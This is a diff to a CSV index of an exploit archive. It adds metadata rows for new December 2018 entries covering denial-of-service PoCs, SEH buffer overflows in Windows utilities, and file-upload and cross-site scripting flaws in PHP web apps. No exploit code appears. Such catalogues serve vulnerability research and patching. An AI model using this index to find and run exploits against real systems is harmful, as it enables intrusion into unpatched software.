--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6226,6 +6226,9 @@ id,file,description,date,author,type,platform,port
 46030,exploits/windows/dos/46030.py,"SQLScan 1.0 - Denial of Service (PoC)",2018-12-21,"Rafael Pedrero",dos,windows,
 46038,exploits/linux/dos/46038.py,"Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC)",2018-12-24,Sam,dos,linux,
 46042,exploits/multiple/dos/46042.html,"Google Chrome 70 - SQLite Magellan Crash (PoC)",2018-12-15,zhuowei,dos,multiple,
+46057,exploits/windows_x86/dos/46057.py,"Product Key Explorer 4.0.9 - Denial of Service (PoC)",2018-12-27,T3jv1l,dos,windows_x86,
+46062,exploits/windows_x86/dos/46062.py,"NetShareWatcher 1.5.8 - Denial of Service (PoC)",2018-12-27,T3jv1l,dos,windows_x86,
+46063,exploits/windows_x86/dos/46063.py,"ShareAlarmPro 2.1.4 - Denial of Service (PoC)",2018-12-27,T3jv1l,dos,windows_x86,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10172,6 +10175,9 @@ id,file,description,date,author,type,platform,port
 46040,exploits/windows/local/46040.txt,"Microsoft Windows - 'MsiAdvertiseProduct' Arbitrary File Copy/Read",2018-12-20,SandboxEscaper,local,windows,
 46044,exploits/linux/local/46044.md,"Keybase keybase-redirector - '$PATH' Local Privilege Escalation",2018-10-22,mirchr,local,linux,
 46051,exploits/windows/local/46051.txt,"Adobe Flash ActiveX Plugin 28.0.0.137 - Remote Code Execution (PoC)",2018-12-24,smgorelik,local,windows,
+46056,exploits/windows_x86/local/46056.py,"MAGIX Music Editor 3.1 - Buffer Overflow (SEH)",2018-12-27,bzyo,local,windows_x86,
+46058,exploits/windows_x86/local/46058.py,"Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)",2018-12-27,bzyo,local,windows_x86,
+46059,exploits/windows_x86/local/46059.py,"Iperius Backup 5.8.1 - Buffer Overflow (SEH)",2018-12-27,bzyo,local,windows_x86,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -40537,3 +40543,7 @@ id,file,description,date,author,type,platform,port
 46037,exploits/php/webapps/46037.txt,"FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection",2018-12-24,"Sainadh Jamalpur",webapps,php,
 46041,exploits/php/webapps/46041.py,"phpMyAdmin 4.8.4 - 'AllowArbitraryServer' Arbitrary File Read",2018-12-15,VulnSpy,webapps,php,
 46050,exploits/php/webapps/46050.txt,"PhpSpreadsheet < 1.5.0 - XML External Entity (XXE)",2018-11-30,"Alex Leahu",webapps,php,
+46054,exploits/php/webapps/46054.txt,"Craft CMS 3.0.25 - Cross-Site Scripting",2018-12-27,"Raif Berkay Dincel",webapps,php,
+46055,exploits/php/webapps/46055.txt,"WordPress Plugin Audio Record 1.0 - Arbitrary File Upload",2018-12-27,Kaimi,webapps,php,
+46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php,
+46061,exploits/php/webapps/46061.txt,"WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload",2018-12-27,Kaimi,webapps,php,